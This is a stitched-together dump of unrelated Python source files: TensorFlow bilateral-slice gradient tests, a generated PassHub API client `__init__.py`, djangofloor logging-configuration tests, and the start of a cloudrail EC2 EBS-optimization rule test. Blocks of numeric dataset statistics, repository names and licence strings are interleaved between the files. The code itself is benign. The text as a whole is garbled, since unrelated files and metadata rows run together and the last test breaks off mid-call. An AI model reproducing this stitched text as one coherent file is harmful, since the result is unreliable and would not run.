and compare them to each # other as well as the gradient checker. def run_grad_test(self, batch_size, h, w, input_channels, gh, gw, gd, output_channels, grad_tensor_name, use_gpu): dev = _get_device_string(use_gpu) gc = (1 + input_channels) * output_channels grid_shape = [batch_size, gh, gw, gd, gc] guide_shape = [batch_size, h, w] output_shape = [batch_size, h, w, gc] grid_data = np.random.rand(*grid_shape).astype(np.float32) guide_data = np.random.rand(*guide_shape).astype(np.float32) tf.reset_default_graph() graph = tf.Graph() with graph.as_default(): with tf.device(dev): grid_tensor = tf.convert_to_tensor( grid_data, name='grid', dtype=tf.float32) guide_tensor = tf.convert_to_tensor( guide_data, name='guide', dtype=tf.float32) output_tensor = ops.bilateral_slice(grid_tensor, guide_tensor) if grad_tensor_name == 'grid': grad_tensor = grid_tensor grad_shape = grid_shape elif grad_tensor_name == 'guide': grad_tensor = guide_tensor grad_shape = guide_shape # It is important to use self.test_session, which will disable the # graph optimization, otherwise it won't use GPU ops. See details here: # https://github.com/tensorflow/tensorflow/issues/2054 with self.test_session(graph=graph, use_gpu=use_gpu, force_gpu=use_gpu): err = tf.test.compute_gradient_error( grad_tensor, grad_shape, output_tensor, output_shape, delta=1e-4) # Note that the gradient cannot be accurate, as trilinear interpolation # is not a smooth function. When the interpolated point is on the grid, # the gradient does not exist. Therefore, the analytical gradient (by # gradient op, implemented in bilateral_slice.cu.cc) and numerical # grident (by tf.test.compute_gradient_error) will never match. self.assertLess(err, 3e-3) @parameterized.expand([('CPU', False), ('GPU', True)]) def test_grid_gradient(self, use_gpu): """True grid derivative should closely match numerical derivative.""" self.run_grad_test( batch_size=3, h=8, w=5, input_channels=3, gh=6, gw=3, gd=7, output_channels=4, use_gpu=use_gpu, grad_tensor_name='grid') @parameterized.expand([('CPU', False), ('GPU', True)]) def test_guide_gradient(self, use_gpu): """True guide derivative should closely match numerical derivative.""" self.run_grad_test( batch_size=1, h=6, w=18, input_channels=1, gh=3, gw=9, gd=7, output_channels=1, use_gpu=use_gpu, grad_tensor_name='guide') class BilateralSliceApplyTest(tf.test.TestCase): def run_bilateral_slice_apply(self, grid_data, guide_data, input_data, use_gpu=False): dev = _get_device_string(use_gpu) graph = tf.Graph() with graph.as_default(): with tf.device(dev): grid_tensor = tf.convert_to_tensor( grid_data, name='grid', dtype=tf.float32) guide_tensor = tf.convert_to_tensor( guide_data, name='guide', dtype=tf.float32) input_tensor = tf.convert_to_tensor( input_data, name='input', dtype=tf.float32) output_tensor = ops.bilateral_slice_apply( grid_tensor, guide_tensor, input_tensor, has_offset=True) with self.test_session( graph=graph, use_gpu=use_gpu, force_gpu=use_gpu) as sess: output_data = sess.run(output_tensor) return output_data, output_tensor def run_bilateral_slice_apply_grad(self, grid_data, guide_data, input_data, use_gpu=False): dev = _get_device_string(use_gpu) graph = tf.Graph() with graph.as_default(): with tf.device(dev): grid_tensor = tf.convert_to_tensor( grid_data, name='grid', dtype=tf.float32) guide_tensor = tf.convert_to_tensor( guide_data, name='guide', dtype=tf.float32) input_tensor = tf.convert_to_tensor( input_data, name='input', dtype=tf.float32) output_tensor = ops.bilateral_slice_apply( grid_tensor, guide_tensor, input_tensor, has_offset=True) grid_grad_tensor, guide_grad_tensor, _ = tf.gradients( output_tensor, [grid_tensor, guide_tensor, input_tensor]) with self.test_session( graph=graph, use_gpu=use_gpu, force_gpu=use_gpu) as sess: grid_grad_data, guide_grad_data = sess.run( [grid_grad_tensor, guide_grad_tensor]) return (grid_grad_tensor, guide_grad_tensor, grid_grad_data, guide_grad_data) def create_forward_test(self, batch_size=3, h=30, w=25, input_channels=3, gh=16, gw=12, gd=8, output_channels=3, randomize_values=True): np.random.seed(1234) gc = output_channels * (1 + input_channels) grid_shape = (batch_size, gh, gw, gd, gc) guide_shape = (batch_size, h, w) input_shape = (batch_size, h, w, input_channels) if randomize_values: grid_data = np.random.rand(*grid_shape).astype(np.float32) guide_data = np.random.rand(*guide_shape).astype(np.float32) input_data = np.random.rand(*input_shape).astype(np.float32) else: grid_data = np.zeros(grid_shape) guide_data = np.zeros(guide_shape) input_data = np.zeros(input_shape) sz = _ForwardTestExtents(batch_size, h, w, input_channels, gh, gw, gd, gc, output_channels) return sz, grid_data, guide_data, input_data @parameterized.expand([('CPU', False), ('GPU', True)]) def test_shape(self, use_gpu): """bilateral_slice_apply(grid, guide) should have the right shape.""" sz, grid_data, guide_data, input_data = self.create_forward_test() output_data, output_tensor = self.run_bilateral_slice_apply( grid_data, guide_data, input_data, use_gpu) _assert_shape_equals(self, [sz.batch_size, sz.h, sz.w, sz.output_channels], output_data, output_tensor) @parameterized.expand([('CPU', False), ('GPU', True)]) def test_grad_shape(self, use_gpu): """grad(bilateral_slice_apply(grid, guide)) should have the right shape.""" sz, grid_data, guide_data, input_data = self.create_forward_test() grid_grad_tensor, guide_grad_tensor, grid_grad_data, guide_grad_data = ( self.run_bilateral_slice_apply_grad(grid_data, guide_data, input_data, use_gpu)) _assert_shape_equals(self, [sz.batch_size, sz.gh, sz.gw, sz.gd, sz.gc], grid_grad_data, grid_grad_tensor) _assert_shape_equals(self, [sz.batch_size, sz.h, sz.w], guide_grad_data, guide_grad_tensor) # TODO(jiawen): Read back both CPU and GPU gradients and compare them to each # other as well as the gradient checker. def run_grad_test(self, batch_size, h, w, input_channels, gh, gw, gd, output_channels, use_gpu, grad_tensor_name): grid_shape = (batch_size, gh, gw, gd, (1 + input_channels) * output_channels) guide_shape = (batch_size, h, w) input_shape = (batch_size, h, w, input_channels) output_shape = (batch_size, h, w, output_channels) grid_data = np.random.rand(*grid_shape).astype(np.float32) guide_data = np.random.rand(*guide_shape).astype(np.float32) input_data = np.random.rand(*input_shape).astype(np.float32) dev = _get_device_string(use_gpu) tf.reset_default_graph() graph = tf.Graph() with graph.as_default(): with tf.device(dev): grid_tensor = tf.convert_to_tensor( grid_data, name='grid', dtype=tf.float32) guide_tensor = tf.convert_to_tensor( guide_data, name='guide', dtype=tf.float32) input_tensor = tf.convert_to_tensor( input_data, name='input', dtype=tf.float32) output_tensor = ops.bilateral_slice_apply( grid_tensor, guide_tensor, input_tensor, has_offset=True) if grad_tensor_name == 'grid': grad_tensor = grid_tensor grad_shape = grid_shape elif grad_tensor_name == 'guide': grad_tensor = guide_tensor grad_shape = guide_shape elif grad_tensor_name == 'input': grad_tensor = input_tensor grad_shape = input_shape # It is important to use self.test_session, which will disable the # graph optimization, otherwise it won't use GPU ops. See details here: # https://github.com/tensorflow/tensorflow/issues/2054 with self.test_session(graph=graph, use_gpu=use_gpu, force_gpu=use_gpu): err = tf.test.compute_gradient_error(grad_tensor, grad_shape, output_tensor, output_shape) self.assertLess(err, 1e-2) @parameterized.expand([('CPU', False), ('GPU', True)]) def test_grid_gradient(self, use_gpu): """True grid derivative should closely match numerical derivative.""" self.run_grad_test( batch_size=3, h=8, w=5, input_channels=3, gh=6, gw=3, gd=7, output_channels=4, use_gpu=use_gpu, grad_tensor_name='grid') @parameterized.expand([('CPU', False), ('GPU', True)]) def test_guide_gradient(self, use_gpu): """True guide derivative should closely match numerical derivative.""" self.run_grad_test( batch_size=1, h=6, w=18, input_channels=1, gh=3, gw=9, gd=7, output_channels=1, use_gpu=use_gpu, grad_tensor_name='guide') @parameterized.expand([('CPU', False), ('GPU', True)]) def test_input_gradient(self, use_gpu): """True input derivative should closely match numerical derivative.""" self.run_grad_test( batch_size=3, h=8, w=5, input_channels=3, gh=6, gw=3, gd=7, output_channels=4, use_gpu=use_gpu, grad_tensor_name='input') if __name__ == '__main__': tf.test.main()
38.26087
80
0.635669
2,114
15,840
4.450804
0.095553
0.036348
0.016261
0.027102
0.878521
0.858646
0.83367
0.823361
0.81167
0.81167
0
0.01253
0.264394
15,840
413
81
38.353511
0.794971
0.125126
0
0.782334
0
0
0.024473
0
0
0
0
0.002421
0.047319
1
0.066246
false
0
0.015773
0
0.113565
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
0cb5dee552c9a9063a932120d91a57d1c0d2b225
3,481
py
Python
sightseeingtech_passhub_api/__init__.py
BYMdevelopment/passhub-api-client-python
13537fe9b03d91aa451eb81a86047d8f715df681
[ "MIT" ]
null
null
null
sightseeingtech_passhub_api/__init__.py
BYMdevelopment/passhub-api-client-python
13537fe9b03d91aa451eb81a86047d8f715df681
[ "MIT" ]
null
null
null
sightseeingtech_passhub_api/__init__.py
BYMdevelopment/passhub-api-client-python
13537fe9b03d91aa451eb81a86047d8f715df681
[ "MIT" ]
null
null
null
# coding: utf-8 # flake8: noqa """ PassHub API PassHub API documentation # noqa: E501 OpenAPI spec version: 1.1 Generated by: https://github.com/swagger-api/swagger-codegen.git """ from __future__ import absolute_import # import apis into sdk package from sightseeingtech_passhub_api.api.order_record_resource_api import OrderRecordResourceApi from sightseeingtech_passhub_api.api.product_resource_api import ProductResourceApi from sightseeingtech_passhub_api.api.vendor_resource_api import VendorResourceApi from sightseeingtech_passhub_api.api.voucher_resource_api import VoucherResourceApi # import ApiClient from sightseeingtech_passhub_api.api_client import ApiClient from sightseeingtech_passhub_api.configuration import Configuration # import models into sdk package from sightseeingtech_passhub_api.models.address import Address from sightseeingtech_passhub_api.models.condition import Condition from sightseeingtech_passhub_api.models.delivery_dto import DeliveryDTO from sightseeingtech_passhub_api.models.extra_validation_param_dto import ExtraValidationParamDTO from sightseeingtech_passhub_api.models.generic_status_dto import GenericStatusDTO from sightseeingtech_passhub_api.models.group_entry_dto import GroupEntryDTO from sightseeingtech_passhub_api.models.json_object import JSONObject from sightseeingtech_passhub_api.models.map_ofstring_andstring import MapOfstringAndstring from sightseeingtech_passhub_api.models.order_item import OrderItem from sightseeingtech_passhub_api.models.order_note_param_dto import OrderNoteParamDTO from sightseeingtech_passhub_api.models.order_record_dto import OrderRecordDTO from sightseeingtech_passhub_api.models.order_record_extend_dto import OrderRecordExtendDTO from sightseeingtech_passhub_api.models.product_dto import ProductDTO from sightseeingtech_passhub_api.models.product_suggestion import ProductSuggestion from sightseeingtech_passhub_api.models.recharge_product_group import RechargeProductGroup from sightseeingtech_passhub_api.models.recharge_prompt import RechargePrompt from sightseeingtech_passhub_api.models.recharge_prompt_entry import RechargePromptEntry from sightseeingtech_passhub_api.models.rule import Rule from sightseeingtech_passhub_api.models.simple_connected_product_dto import SimpleConnectedProductDTO from sightseeingtech_passhub_api.models.simple_metadata import SimpleMetadata from sightseeingtech_passhub_api.models.simple_product_connection_dto import SimpleProductConnectionDTO from sightseeingtech_passhub_api.models.simple_product_dto import SimpleProductDTO from sightseeingtech_passhub_api.models.suggested_order import SuggestedOrder from sightseeingtech_passhub_api.models.suggested_order_item import SuggestedOrderItem from sightseeingtech_passhub_api.models.universal_attribute import UniversalAttribute from sightseeingtech_passhub_api.models.user_compact_dto import UserCompactDTO from sightseeingtech_passhub_api.models.user_dto import UserDTO from sightseeingtech_passhub_api.models.validation_item_status_dto import ValidationItemStatusDTO from sightseeingtech_passhub_api.models.validation_result import ValidationResult from sightseeingtech_passhub_api.models.validation_result_entry import ValidationResultEntry from sightseeingtech_passhub_api.models.vendor_dto import VendorDTO from sightseeingtech_passhub_api.models.vendor_detail_dto import VendorDetailDTO from sightseeingtech_passhub_api.models.voucher_pattern import VoucherPattern
57.065574
103
0.904625
417
3,481
7.201439
0.261391
0.13653
0.337662
0.376623
0.536797
0.384282
0.190476
0
0
0
0
0.002152
0.065498
3,481
60
104
58.016667
0.920996
0.071818
0
0
1
0
0
0
0
0
0
0
0
1
0
true
0.975
1
0
1
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
1
1
1
0
1
0
0
7
f046ddc8d25dd3a7fbbfa8cebdf6d6baf9815cfb
30,352
py
Python
djangofloor/tests/test_log.py
d9pouces/django-floor
f4f0986e755c1a2b2d0cd97ed11384dffa9fef35
[ "CECILL-B" ]
11
2015-08-04T08:56:10.000Z
2020-10-03T11:55:28.000Z
djangofloor/tests/test_log.py
d9pouces/django-floor
f4f0986e755c1a2b2d0cd97ed11384dffa9fef35
[ "CECILL-B" ]
21
2015-12-02T07:52:50.000Z
2019-08-20T15:55:57.000Z
djangofloor/tests/test_log.py
d9pouces/django-floor
f4f0986e755c1a2b2d0cd97ed11384dffa9fef35
[ "CECILL-B" ]
6
2015-11-10T08:36:14.000Z
2020-10-23T23:10:02.000Z
import os import platform import socket import tempfile from io import StringIO from unittest import TestCase from djangofloor.log import LogConfiguration excluded_commands = { "migrate", "npm", "sendtestemail", "clearsessions", "createsuperuser", "sqlflush", "makemigrations", "startapp", "compilemessages", "test", "flush", "sqlsequencereset", "makemessages", "remove_stale_contenttypes", "dumpdb", "collectstatic", "config", "dumpdata", "showmigrations", "packaging", "sqlmigrate", "squashmigrations", "gen_dev_files", "createcachetable", "loaddata", "shell", "testserver", "changepassword", "dbshell", "inspectdb", "check", "ping_google", } class TestLogConfig(TestCase): maxDiff = None def setUp(self) -> None: self.config = LogConfiguration(stdout=StringIO(), stderr=StringIO()) def test_dev_syslog(self): r = self.config( { "DEBUG": False, "DF_MODULE_NAME": "djangofloor", "SCRIPT_NAME": "worker", "LOG_DIRECTORY": None, "LOG_REMOTE_URL": "syslog://", "LOG_REMOTE_ACCESS": None, "SERVER_NAME": "localhost", "SERVER_PORT": "80", "LOG_EXCLUDED_COMMANDS": excluded_commands, "RAVEN_DSN": None, "LOG_LEVEL": None, }, argv=["manage.py", "test"], ) if platform.system() == "Darwin": address = "/var/run/syslog" elif platform.system() == "Linux": address = "/dev/log" else: address = ("localhost", 514) self.assertEqual( { "version": 1, "disable_existing_loggers": True, "formatters": { "django.server": { "()": "djangofloor.log.ServerFormatter", "format": "%(asctime)s [localhost:80] %(message)s", }, "nocolor": { "()": "logging.Formatter", "fmt": "%(asctime)s [localhost:80] [%(levelname)s] %(message)s", "datefmt": "%Y-%m-%d %H:%M:%S", }, "colorized": {"()": "djangofloor.log.ColorizedFormatter"}, }, "filters": { "remove_duplicate_warnings": { "()": "djangofloor.log.RemoveDuplicateWarnings" } }, "handlers": { "mail_admins": { "class": "djangofloor.log.AdminEmailHandler", "level": "ERROR", "include_html": True, }, "syslog.warn": { "class": "logging.handlers.SysLogHandler", "level": "WARN", "address": address, "facility": 8, "socktype": socket.SOCK_DGRAM, }, }, "loggers": { "django": {"handlers": [], "level": "ERROR", "propagate": True}, "django.db": {"handlers": [], "level": "ERROR", "propagate": True}, "django.db.backends": { "handlers": [], "level": "ERROR", "propagate": True, }, "django.request": { "handlers": [], "level": "WARN", "propagate": True, }, "django.security": { "handlers": [], "level": "ERROR", "propagate": True, }, "djangofloor.signals": { "handlers": [], "level": "WARN", "propagate": True, }, "gunicorn.error": { "handlers": [], "level": "WARN", "propagate": True, }, "pip.vcs": {"handlers": [], "level": "ERROR", "propagate": True}, "py.warnings": { "handlers": [], "level": "ERROR", "propagate": True, "filters": ["remove_duplicate_warnings"], }, "aiohttp.access": { "handlers": [], "level": "INFO", "propagate": False, }, "django.server": { "handlers": [], "level": "INFO", "propagate": False, }, "geventwebsocket.handler": { "handlers": [], "level": "INFO", "propagate": False, }, "gunicorn.access": { "handlers": [], "level": "INFO", "propagate": False, }, }, "root": {"handlers": ["syslog.warn", "mail_admins"], "level": "WARN"}, }, r, ) def test_syslog(self): r = self.config( { "DEBUG": False, "DF_MODULE_NAME": "djangofloor", "SCRIPT_NAME": "worker", "LOG_DIRECTORY": None, "LOG_REMOTE_URL": "syslog://localhost:514/user", "LOG_REMOTE_ACCESS": None, "SERVER_NAME": "localhost", "SERVER_PORT": "80", "LOG_EXCLUDED_COMMANDS": excluded_commands, "RAVEN_DSN": None, "LOG_LEVEL": None, }, argv=["manage.py", "test"], ) self.assertEqual( { "version": 1, "disable_existing_loggers": True, "formatters": { "django.server": { "()": "djangofloor.log.ServerFormatter", "format": "%(asctime)s [localhost:80] %(message)s", }, "nocolor": { "()": "logging.Formatter", "fmt": "%(asctime)s [localhost:80] [%(levelname)s] %(message)s", "datefmt": "%Y-%m-%d %H:%M:%S", }, "colorized": {"()": "djangofloor.log.ColorizedFormatter"}, }, "filters": { "remove_duplicate_warnings": { "()": "djangofloor.log.RemoveDuplicateWarnings" } }, "handlers": { "mail_admins": { "class": "djangofloor.log.AdminEmailHandler", "level": "ERROR", "include_html": True, }, "syslog.warn": { "class": "logging.handlers.SysLogHandler", "level": "WARN", "address": ("localhost", 514), "facility": 1, "socktype": socket.SOCK_DGRAM, }, }, "loggers": { "django": {"handlers": [], "level": "ERROR", "propagate": True}, "django.db": {"handlers": [], "level": "ERROR", "propagate": True}, "django.db.backends": { "handlers": [], "level": "ERROR", "propagate": True, }, "django.request": { "handlers": [], "level": "WARN", "propagate": True, }, "django.security": { "handlers": [], "level": "ERROR", "propagate": True, }, "djangofloor.signals": { "handlers": [], "level": "WARN", "propagate": True, }, "gunicorn.error": { "handlers": [], "level": "WARN", "propagate": True, }, "pip.vcs": {"handlers": [], "level": "ERROR", "propagate": True}, "py.warnings": { "handlers": [], "level": "ERROR", "propagate": True, "filters": ["remove_duplicate_warnings"], }, "aiohttp.access": { "handlers": [], "level": "INFO", "propagate": False, }, "django.server": { "handlers": [], "level": "INFO", "propagate": False, }, "geventwebsocket.handler": { "handlers": [], "level": "INFO", "propagate": False, }, "gunicorn.access": { "handlers": [], "level": "INFO", "propagate": False, }, }, "root": {"handlers": ["syslog.warn", "mail_admins"], "level": "WARN"}, }, r, ) def test_syslog_debug(self): r = self.config( { "DEBUG": False, "DF_MODULE_NAME": "djangofloor", "SCRIPT_NAME": "worker", "LOG_DIRECTORY": None, "LOG_REMOTE_URL": "syslog://localhost:514/user", "LOG_REMOTE_ACCESS": None, "SERVER_NAME": "localhost", "SERVER_PORT": "80", "LOG_EXCLUDED_COMMANDS": excluded_commands, "RAVEN_DSN": None, "LOG_LEVEL": "DEBUG", }, argv=["manage.py", "test"], ) self.assertEqual( { "version": 1, "disable_existing_loggers": True, "formatters": { "django.server": { "()": "djangofloor.log.ServerFormatter", "format": "%(asctime)s [localhost:80] %(message)s", }, "nocolor": { "()": "logging.Formatter", "fmt": "%(asctime)s [localhost:80] [%(levelname)s] %(message)s", "datefmt": "%Y-%m-%d %H:%M:%S", }, "colorized": {"()": "djangofloor.log.ColorizedFormatter"}, }, "filters": { "remove_duplicate_warnings": { "()": "djangofloor.log.RemoveDuplicateWarnings" } }, "handlers": { "mail_admins": { "class": "djangofloor.log.AdminEmailHandler", "level": "ERROR", "include_html": True, }, "syslog.warn": { "class": "logging.handlers.SysLogHandler", "level": "WARN", "address": ("localhost", 514), "facility": 1, "socktype": socket.SOCK_DGRAM, }, }, "loggers": { "django": {"handlers": [], "level": "INFO", "propagate": True}, "django.db": {"handlers": [], "level": "INFO", "propagate": True}, "django.db.backends": { "handlers": [], "level": "INFO", "propagate": True, }, "django.request": { "handlers": [], "level": "DEBUG", "propagate": True, }, "django.security": { "handlers": [], "level": "INFO", "propagate": True, }, "djangofloor.signals": { "handlers": [], "level": "DEBUG", "propagate": True, }, "gunicorn.error": { "handlers": [], "level": "DEBUG", "propagate": True, }, "pip.vcs": {"handlers": [], "level": "INFO", "propagate": True}, "py.warnings": { "handlers": [], "level": "INFO", "propagate": True, "filters": ["remove_duplicate_warnings"], }, "aiohttp.access": { "handlers": [], "level": "INFO", "propagate": False, }, "django.server": { "handlers": [], "level": "INFO", "propagate": False, }, "geventwebsocket.handler": { "handlers": [], "level": "INFO", "propagate": False, }, "gunicorn.access": { "handlers": [], "level": "INFO", "propagate": False, }, }, "root": {"handlers": ["syslog.warn", "mail_admins"], "level": "DEBUG"}, }, r, ) def test_not_debug_config(self): with tempfile.TemporaryDirectory() as tmp_dir: r = self.config( { "DEBUG": False, "DF_MODULE_NAME": "djangofloor", "SCRIPT_NAME": "worker", "LOG_DIRECTORY": tmp_dir, "LOG_REMOTE_URL": None, "LOG_REMOTE_ACCESS": None, "SERVER_NAME": "localhost", "SERVER_PORT": "80", "LOG_EXCLUDED_COMMANDS": excluded_commands, "RAVEN_DSN": None, "LOG_LEVEL": None, }, argv=["manage.py", "test"], ) self.assertEqual( { "version": 1, "disable_existing_loggers": True, "formatters": { "django.server": { "()": "djangofloor.log.ServerFormatter", "format": "%(asctime)s [localhost:80] %(message)s", }, "nocolor": { "()": "logging.Formatter", "fmt": "%(asctime)s [localhost:80] [%(levelname)s] %(message)s", "datefmt": "%Y-%m-%d %H:%M:%S", }, "colorized": {"()": "djangofloor.log.ColorizedFormatter"}, }, "filters": { "remove_duplicate_warnings": { "()": "djangofloor.log.RemoveDuplicateWarnings" } }, "handlers": { "mail_admins": { "class": "djangofloor.log.AdminEmailHandler", "level": "ERROR", "include_html": True, }, "djangofloor-worker.root": { "class": "logging.handlers.RotatingFileHandler", "maxBytes": 1000000, "backupCount": 3, "formatter": "nocolor", "filename": os.path.join( tmp_dir, "djangofloor-worker-root.log" ), "level": "WARN", }, "djangofloor-worker.access": { "class": "logging.handlers.RotatingFileHandler", "maxBytes": 1000000, "backupCount": 3, "formatter": "nocolor", "filename": os.path.join( tmp_dir, "djangofloor-worker-access.log" ), "level": "DEBUG", }, }, "loggers": { "django": { "handlers": [], "level": "ERROR", "propagate": True, }, "django.db": { "handlers": [], "level": "ERROR", "propagate": True, }, "django.db.backends": { "handlers": [], "level": "ERROR", "propagate": True, }, "django.request": { "handlers": [], "level": "WARN", "propagate": True, }, "django.security": { "handlers": [], "level": "ERROR", "propagate": True, }, "djangofloor.signals": { "handlers": [], "level": "WARN", "propagate": True, }, "gunicorn.error": { "handlers": [], "level": "WARN", "propagate": True, }, "pip.vcs": { "handlers": [], "level": "ERROR", "propagate": True, }, "py.warnings": { "handlers": [], "level": "ERROR", "propagate": True, "filters": ["remove_duplicate_warnings"], }, "aiohttp.access": { "handlers": ["djangofloor-worker.access"], "level": "INFO", "propagate": False, }, "django.server": { "handlers": ["djangofloor-worker.access"], "level": "INFO", "propagate": False, }, "geventwebsocket.handler": { "handlers": ["djangofloor-worker.access"], "level": "INFO", "propagate": False, }, "gunicorn.access": { "handlers": ["djangofloor-worker.access"], "level": "INFO", "propagate": False, }, }, "root": { "handlers": ["djangofloor-worker.root", "mail_admins"], "level": "WARN", }, }, r, ) def test_debug_config(self): r = self.config( { "DEBUG": True, "DF_MODULE_NAME": "djangofloor", "SCRIPT_NAME": "worker", "LOG_DIRECTORY": None, "LOG_REMOTE_URL": None, "LOG_REMOTE_ACCESS": None, "SERVER_NAME": "localhost", "SERVER_PORT": "80", "LOG_EXCLUDED_COMMANDS": excluded_commands, "RAVEN_DSN": None, "LOG_LEVEL": None, }, argv=["manage.py", "test"], ) self.assertEqual( { "version": 1, "disable_existing_loggers": True, "formatters": { "django.server": { "()": "djangofloor.log.ServerFormatter", "format": "%(asctime)s [localhost:80] %(message)s", }, "nocolor": { "()": "logging.Formatter", "fmt": "%(asctime)s [localhost:80] [%(levelname)s] %(message)s", "datefmt": "%Y-%m-%d %H:%M:%S", }, "colorized": {"()": "djangofloor.log.ColorizedFormatter"}, }, "filters": { "remove_duplicate_warnings": { "()": "djangofloor.log.RemoveDuplicateWarnings" } }, "handlers": { "mail_admins": { "class": "djangofloor.log.AdminEmailHandler", "level": "ERROR", "include_html": True, }, "stdout.info": { "class": "logging.StreamHandler", "level": "INFO", "stream": "ext://sys.stdout", "formatter": None, }, "stderr.debug": { "class": "logging.StreamHandler", "level": "DEBUG", "stream": "ext://sys.stderr", "formatter": None, }, }, "loggers": { "aiohttp.access": { "handlers": ["stderr.debug"], "level": "INFO", "propagate": False, }, "django": {"handlers": [], "level": "INFO", "propagate": True}, "django.db": {"handlers": [], "level": "INFO", "propagate": True}, "django.db.backends": { "handlers": [], "level": "INFO", "propagate": True, }, "django.request": { "handlers": [], "level": "DEBUG", "propagate": True, }, "django.server": { "handlers": ["stderr.debug"], "level": "INFO", "propagate": False, }, "django.security": { "handlers": [], "level": "INFO", "propagate": True, }, "djangofloor.signals": { "handlers": [], "level": "DEBUG", "propagate": True, }, "geventwebsocket.handler": { "handlers": ["stderr.debug"], "level": "INFO", "propagate": False, }, "gunicorn.access": { "handlers": ["stderr.debug"], "level": "INFO", "propagate": False, }, "gunicorn.error": { "handlers": [], "level": "DEBUG", "propagate": True, }, "pip.vcs": {"handlers": [], "level": "INFO", "propagate": True}, "py.warnings": { "handlers": [], "level": "INFO", "propagate": True, "filters": ["remove_duplicate_warnings"], }, }, "root": {"handlers": ["stdout.info"], "level": "DEBUG"}, }, r, ) def test_debug_config_error(self): r = self.config( { "DEBUG": True, "DF_MODULE_NAME": "djangofloor", "SCRIPT_NAME": "worker", "LOG_DIRECTORY": None, "LOG_REMOTE_URL": None, "LOG_REMOTE_ACCESS": None, "SERVER_NAME": "localhost", "SERVER_PORT": "80", "LOG_EXCLUDED_COMMANDS": excluded_commands, "RAVEN_DSN": None, "LOG_LEVEL": "ERROR", } ) self.assertEqual( { "version": 1, "disable_existing_loggers": True, "formatters": { "django.server": { "()": "djangofloor.log.ServerFormatter", "format": "%(asctime)s [localhost:80] %(message)s", }, "nocolor": { "()": "logging.Formatter", "fmt": "%(asctime)s [localhost:80] [%(levelname)s] %(message)s", "datefmt": "%Y-%m-%d %H:%M:%S", }, "colorized": {"()": "djangofloor.log.ColorizedFormatter"}, }, "filters": { "remove_duplicate_warnings": { "()": "djangofloor.log.RemoveDuplicateWarnings" } }, "handlers": { "mail_admins": { "class": "djangofloor.log.AdminEmailHandler", "level": "ERROR", "include_html": True, }, "stdout.info": { "class": "logging.StreamHandler", "level": "INFO", "stream": "ext://sys.stdout", "formatter": None, }, "stderr.debug": { "class": "logging.StreamHandler", "level": "DEBUG", "stream": "ext://sys.stderr", "formatter": None, }, }, "loggers": { "aiohttp.access": { "handlers": ["stderr.debug"], "level": "INFO", "propagate": False, }, "django": {"handlers": [], "level": "CRITICAL", "propagate": True}, "django.db": { "handlers": [], "level": "CRITICAL", "propagate": True, }, "django.db.backends": { "handlers": [], "level": "CRITICAL", "propagate": True, }, "django.request": { "handlers": [], "level": "ERROR", "propagate": True, }, "django.server": { "handlers": ["stderr.debug"], "level": "INFO", "propagate": False, }, "django.security": { "handlers": [], "level": "CRITICAL", "propagate": True, }, "djangofloor.signals": { "handlers": [], "level": "ERROR", "propagate": True, }, "geventwebsocket.handler": { "handlers": ["stderr.debug"], "level": "INFO", "propagate": False, }, "gunicorn.access": { "handlers": ["stderr.debug"], "level": "INFO", "propagate": False, }, "gunicorn.error": { "handlers": [], "level": "ERROR", "propagate": True, }, "pip.vcs": { "handlers": [], "level": "CRITICAL", "propagate": True, }, "py.warnings": { "handlers": [], "level": "CRITICAL", "propagate": True, "filters": ["remove_duplicate_warnings"], }, }, "root": {"handlers": ["stdout.info"], "level": "ERROR"}, }, r, )
38.566709
92
0.320144
1,584
30,352
6.028409
0.108586
0.089852
0.067861
0.065347
0.90533
0.896743
0.878312
0.861451
0.850141
0.839041
0
0.005539
0.54797
30,352
786
93
38.615776
0.690452
0
0
0.695709
0
0
0.289602
0.068595
0
0
0
0
0.007802
1
0.009103
false
0.0013
0.009103
0
0.020806
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
f06456d9313775c86c36b1e8171241200048ca38
4,285
py
Python
tests/knowledge/rules/aws/non_context_aware/performance_optimization/test_ensure_ec2_instance_ebs_optimized_rule.py
my-devops-info/cloudrail-knowledge
b7c1bbd6fe1faeb79c105a01c0debbe24d031a0e
[ "MIT" ]
null
null
null
tests/knowledge/rules/aws/non_context_aware/performance_optimization/test_ensure_ec2_instance_ebs_optimized_rule.py
my-devops-info/cloudrail-knowledge
b7c1bbd6fe1faeb79c105a01c0debbe24d031a0e
[ "MIT" ]
null
null
null
tests/knowledge/rules/aws/non_context_aware/performance_optimization/test_ensure_ec2_instance_ebs_optimized_rule.py
my-devops-info/cloudrail-knowledge
b7c1bbd6fe1faeb79c105a01c0debbe24d031a0e
[ "MIT" ]
null
null
null
import unittest from cloudrail.dev_tools.rule_test_utils import create_empty_entity from cloudrail.knowledge.context.aws.account.account import Account from cloudrail.knowledge.context.aws.ec2.ec2_instance import Ec2Instance from cloudrail.knowledge.context.aws.ec2.ec2_instance_type import EbsInfo, Ec2InstanceType from cloudrail.knowledge.context.aws.aws_environment_context import AwsEnvironmentContext from cloudrail.knowledge.rules.aws.non_context_aware.performance_optimization.ensure_ec2_instance_ebs_optimized_rule import \ EnsureEc2InstanceEbsOptimizedRule from cloudrail.knowledge.rules.base_rule import RuleResultType class TestEnsureEc2InstanceEbsOptimizedRule(unittest.TestCase): def setUp(self): self.rule = EnsureEc2InstanceEbsOptimizedRule() def test_non_car_ec2_instance_is_ebs_optimized_fail(self): # Arrange ec2: Ec2Instance = create_empty_entity(Ec2Instance) ec2_instance_type = Ec2InstanceType('t2.micro', EbsInfo('default', 'supported')) account: Account = create_empty_entity(Account) account.account = '11111111' ec2.instance_type = 't3.micro' ec2.ebs_optimized = False context = AwsEnvironmentContext(ec2s=[ec2], accounts=[account], ec2_instance_types=[ec2_instance_type]) # Act result = self.rule.run(context, {}) # Assert self.assertEqual(RuleResultType.FAILED, result.status) self.assertEqual(1, len(result.issues)) def test_non_car_ec2_instance_is_ebs_optimized__no_list_ebs_not_optimized__fail(self): # Arrange ec2: Ec2Instance = create_empty_entity(Ec2Instance) ec2_instance_type = Ec2InstanceType('t2.micro', EbsInfo('default', 'supported')) account: Account = create_empty_entity(Account) account.account = '11111111' ec2.instance_type = 't3.micro' ec2.ebs_optimized = False context = AwsEnvironmentContext(ec2s=[ec2], 